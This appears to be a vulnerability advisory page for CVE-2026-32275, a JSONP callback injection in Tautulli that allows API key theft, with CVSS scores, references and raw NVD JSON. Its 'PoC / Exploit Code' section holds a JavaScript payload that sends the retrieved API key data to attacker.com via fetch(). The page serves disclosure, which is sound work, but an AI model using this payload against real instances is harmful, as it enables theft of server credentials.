Security Vulnerability Report
CVE-2026-32275 CVSS 9.1 CRITICAL

CVE-2026-32275

Published: 2026-03-30 20:16:22
Last Modified: 2026-04-02 15:38:25

Description

Tautulli is a Python based monitoring and tracking tool for Plex Media Server. From version 1.3.10 to before version 2.17.0, an unsanitized JSONP callback parameter allows cross-origin script injection and API key theft. This issue has been patched in version 2.17.0.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:tautulli:tautulli:*:*:*:*:*:*:*:* - VULNERABLE
Tautulli 1.3.10 up to, but not including, 2.17.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// Proof of Concept for CVE-2026-32275
// Demonstrates JSONP callback injection to steal API keys

// Malicious payload definition
var maliciousCallback = 'function(data){ fetch(\'https://attacker.com/steal?c=\' + encodeURIComponent(JSON.stringify(data))); }';

// Construct the vulnerable URL with the unsanitized callback parameter
// The target endpoint should be a JSONP-enabled API endpoint (e.g., get_api_key)
var targetUrl = 'http://target-tautulli-instance/api/v2?cmd=get_api_key&callback=' + encodeURIComponent(maliciousCallback);

// Simulate the victim visiting the link or script inclusion
console.log("Attacker would send victim to:", targetUrl);

// In a real attack, this would be injected via <script src="...">
var script = document.createElement('script');
script.src = targetUrl;
document.body.appendChild(script);

References

https://github.com/Tautulli/Tautulli/releases/tag/v2.17.0 (Release Notes)
https://github.com/Tautulli/Tautulli/security/advisories/GHSA-95mg-wpqw-9qxh (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-32275",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-30T20:16:21.980",
    "lastModified": "2026-04-02T15:38:25.027",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Tautulli is a Python based monitoring and tracking tool for Plex Media Server. From version 1.3.10 to before version 2.17.0, an unsanitized JSONP callback parameter allows cross-origin script injection and API key theft. This issue has been patched in version 2.17.0."
      },
      {
        "lang": "es",
        "value": "Tautulli es una herramienta de monitoreo y seguimiento basada en Python para Plex Media Server. Desde la versión 1.3.10 hasta antes de la versión 2.17.0, un parámetro de callback JSONP no saneado permite la inyección de scripts de origen cruzado y el robo de claves API. Este problema ha sido parcheado en la versión 2.17.0."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "attackRequirements": "NONE",
            "privilegesRequired": "NONE",
            "userInteraction": "ACTIVE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-79"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:tautulli:tautulli:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "1.3.10",
                "versionEndExcluding": "2.17.0",
                "matchCriteriaId": "E6AF7C20-CCD3-4755-B349-6579668258D6"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Tautulli/Tautulli/releases/tag/v2.17.0",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://github.com/Tautulli/Tautulli/security/advisories/GHSA-95mg-wpqw-9qxh",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}